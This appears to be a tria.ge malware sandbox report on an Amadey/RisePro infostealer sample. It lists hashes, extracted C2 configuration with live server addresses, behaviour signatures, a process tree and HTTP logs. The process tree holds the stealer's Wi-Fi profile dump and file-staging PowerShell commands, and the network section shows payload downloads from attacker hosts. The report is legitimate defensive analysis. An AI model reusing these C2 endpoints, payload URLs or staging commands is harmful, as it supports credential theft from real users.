Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    262s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04/04/2024, 22:29 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    346c7d1fc9a65c1f071034126d263ca47ce7d80a1a1b173e373fe664541d51e4.exe

  • Size

    1.8MB

  • MD5

    a25b46f5edd72724417c637e8e33f64b

  • SHA1

    f4cba5b47829e9c89ab72564f0b146c3af5300eb

  • SHA256

    346c7d1fc9a65c1f071034126d263ca47ce7d80a1a1b173e373fe664541d51e4

  • SHA512

    d145822656ae774308c72df217082cb2abfc67a626c5e3fe55fcda965d81443096942b6fe14b34e96a19562817d892f50bb697477567481c863b29998c91d71f

  • SSDEEP

    49152:8KMvuGU5CSkvDhMNNHCV1lX8+m0gaSGmkD775uSA1IlAFI:8hvuGU5CKNNHwRm0g3GNP75uVF

Score
10/10
amadeyriseprogoogleevasionpersistencephishingspywarestealerthemidatrojan

Malware Config

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Detected google phishing page
    phishinggoogle
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

    stealerrisepro
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
    evasion
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 6 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: MapViewOfSection 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\346c7d1fc9a65c1f071034126d263ca47ce7d80a1a1b173e373fe664541d51e4.exe
    "C:\Users\Admin\AppData\Local\Temp\346c7d1fc9a65c1f071034126d263ca47ce7d80a1a1b173e373fe664541d51e4.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3616
    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4492
      • C:\Users\Admin\AppData\Local\Temp\1000042001\03cbc93224.exe
        "C:\Users\Admin\AppData\Local\Temp\1000042001\03cbc93224.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        PID:2188
      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
        "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
        3⤵
          PID:1960
        • C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe
          "C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4512
        • C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe
          "C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:800
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:4088
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3632
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              5⤵
                PID:4252
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\604470191232_Desktop.zip' -CompressionLevel Optimal
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4340
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
            3⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            PID:824
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
        1⤵
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:1528
      • C:\Windows\system32\browser_broker.exe
        C:\Windows\system32\browser_broker.exe -Embedding
        1⤵
        • Modifies Internet Explorer settings
        PID:3920
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Modifies registry class
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4592
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2880
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        • Modifies registry class
        PID:4700
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        • Modifies registry class
        PID:688
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        PID:4204
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        • Modifies registry class
        PID:4388
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        • Modifies registry class
        PID:1688
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:5084
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Modifies registry class
        PID:4188
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Modifies registry class
        PID:1588
      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
        C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:5368
      • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
        C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:5376
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
          2⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:5844
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
            3⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5864
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              4⤵
                PID:5884
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\604470191232_Desktop.zip' -CompressionLevel Optimal
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5972
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
            2⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            PID:5416
        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:5908
        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:5196
        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:352
        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:5900

        Network

        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 4
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:11 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Refresh: 0; url = Login.php
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 158
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:11 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:15 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:18 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          GET
          http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1
          Host: 193.233.132.56
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:21 GMT
          Content-Type: application/octet-stream
          Content-Length: 1285632
          Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT
          Connection: keep-alive
          ETag: "65e464f9-139e00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1
          Host: 193.233.132.56
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:34 GMT
          Content-Type: application/octet-stream
          Content-Length: 112128
          Last-Modified: Sun, 03 Mar 2024 11:54:32 GMT
          Connection: keep-alive
          ETag: "65e464f8-1b600"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://193.233.132.167/cost/random.exe
          explorha.exe
          Remote address:
          193.233.132.167:80
          Request
          GET /cost/random.exe HTTP/1.1
          Host: 193.233.132.167
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:11 GMT
          Content-Type: application/octet-stream
          Content-Length: 3172352
          Last-Modified: Thu, 04 Apr 2024 22:01:44 GMT
          Connection: keep-alive
          ETag: "660f2348-306800"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://193.233.132.167/cost/sarra.exe
          explorha.exe
          Remote address:
          193.233.132.167:80
          Request
          GET /cost/sarra.exe HTTP/1.1
          Host: 193.233.132.167
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:15 GMT
          Content-Type: application/octet-stream
          Content-Length: 3191296
          Last-Modified: Thu, 04 Apr 2024 22:02:28 GMT
          Connection: keep-alive
          ETag: "660f2374-30b200"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://193.233.132.167/cost/go.exe
          explorha.exe
          Remote address:
          193.233.132.167:80
          Request
          GET /cost/go.exe HTTP/1.1
          Host: 193.233.132.167
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:18 GMT
          Content-Type: application/octet-stream
          Content-Length: 915968
          Last-Modified: Wed, 27 Mar 2024 13:46:47 GMT
          Connection: keep-alive
          ETag: "66042347-dfa00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://193.233.132.167/mine/amert.exe
          explorha.exe
          Remote address:
          193.233.132.167:80
          Request
          GET /mine/amert.exe HTTP/1.1
          Host: 193.233.132.167
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:20 GMT
          Content-Type: application/octet-stream
          Content-Length: 1894400
          Last-Modified: Thu, 04 Apr 2024 22:03:20 GMT
          Connection: keep-alive
          ETag: "660f23a8-1ce800"
          Accept-Ranges: bytes
        • flag-us
          DNS
          56.132.233.193.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          56.132.233.193.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          167.132.233.193.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          167.132.233.193.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          www.youtube.com
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          www.youtube.com
          IN A
          Response
          www.youtube.com
          IN CNAME
          youtube-ui.l.google.com
          youtube-ui.l.google.com
          IN A
          142.250.180.14
          youtube-ui.l.google.com
          IN A
          142.250.187.206
          youtube-ui.l.google.com
          IN A
          142.250.187.238
          youtube-ui.l.google.com
          IN A
          142.250.178.14
          youtube-ui.l.google.com
          IN A
          172.217.16.238
          youtube-ui.l.google.com
          IN A
          142.250.200.14
          youtube-ui.l.google.com
          IN A
          142.250.200.46
          youtube-ui.l.google.com
          IN A
          216.58.201.110
          youtube-ui.l.google.com
          IN A
          216.58.204.78
          youtube-ui.l.google.com
          IN A
          172.217.169.14
          youtube-ui.l.google.com
          IN A
          216.58.212.238
          youtube-ui.l.google.com
          IN A
          172.217.169.78
          youtube-ui.l.google.com
          IN A
          172.217.169.46
          youtube-ui.l.google.com
          IN A
          142.250.179.238
        • flag-us
          DNS
          www.facebook.com
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          www.facebook.com
          IN A
          Response
          www.facebook.com
          IN CNAME
          star-mini.c10r.facebook.com
          star-mini.c10r.facebook.com
          IN A
          157.240.210.35
        • flag-us
          DNS
          accounts.google.com
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          accounts.google.com
          IN A
          Response
          accounts.google.com
          IN A
          108.177.15.84
        • flag-gb
          GET
          https://www.youtube.com/account
          MicrosoftEdgeCP.exe
          Remote address:
          142.250.180.14:443
          Request
          GET /account HTTP/2.0
          host: www.youtube.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 302
          content-type: application/binary
          x-content-type-options: nosniff
          cache-control: no-cache, no-store, max-age=0, must-revalidate
          pragma: no-cache
          expires: Mon, 01 Jan 1990 00:00:00 GMT
          date: Thu, 04 Apr 2024 22:29:21 GMT
          location: https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
          strict-transport-security: max-age=31536000
          x-frame-options: SAMEORIGIN
          permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
          origin-trial: AvC9UlR6RDk2crliDsFl66RWLnTbHrDbp+DiY6AYz/PNQ4G4tdUTjrHYr2sghbkhGQAVxb7jaPTHpEVBz0uzQwkAAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTcxOTUzMjc5OSwiaXNTdWJkb21haW4iOnRydWV9
          cross-origin-opener-policy: same-origin-allow-popups; report-to="youtube_main"
          p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
          server: ESF
          content-length: 0
          x-xss-protection: 0
          set-cookie: SOCS=CAAaBgiA27ewBg; Domain=.youtube.com; Expires=Sun, 04-May-2025 22:29:21 GMT; Path=/; Secure; SameSite=lax
          set-cookie: YSC=DkVMqqSg6aI; Domain=.youtube.com; Path=/; Secure; HttpOnly
          set-cookie: __Secure-YEC=CgtQNnJwdFpkbnY2RSjB07ywBjIKCgJHQhIEGgAgPg%3D%3D; Domain=.youtube.com; Expires=Sun, 04-May-2025 22:29:20 GMT; Path=/; Secure; HttpOnly; SameSite=lax
          set-cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgPg%3D%3D; Domain=.youtube.com; Expires=Sun, 04-May-2025 22:29:21 GMT; Path=/; Secure; HttpOnly
          set-cookie: VISITOR_INFO1_LIVE=; Domain=.youtube.com; Expires=Fri, 09-Jul-2021 22:29:21 GMT; Path=/; Secure; HttpOnly
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-de
          GET
          https://www.facebook.com/video
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /video HTTP/2.0
          host: www.facebook.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          pragma: no-cache
          cache-control: private, no-cache, no-store, must-revalidate
          expires: Sat, 01 Jan 2000 00:00:00 GMT
          content-type: text/html;charset=utf-8
          strict-transport-security: max-age=15552000; preload
          x-fb-debug: ZbzL5LNcub9fB7nbjyCkKtRMZZvcKi0lGzVwrlg6fpG19HoH+uJYLMuiiNARUNkG/95iMRwVgU8qPp6c4m3zqA==
          content-length: 421
          date: Thu, 04 Apr 2024 22:29:22 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=0, c=10, mss=1357, tbw=3398, tp=-1, tpl=-1, uplat=54, ullat=0
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://www.facebook.com/images/cookies/cookie_info_card_image_1.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /images/cookies/cookie_info_card_image_1.png HTTP/2.0
          host: www.facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          content-md5: Nmnpiyrpc00QHVchkNDJDQ==
          edge-control: cache-maxage=86400s
          expires: Fri, 05 Apr 2024 00:35:26 GMT
          cache-control: public,max-age=86400
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          document-policy: force-load-at-top
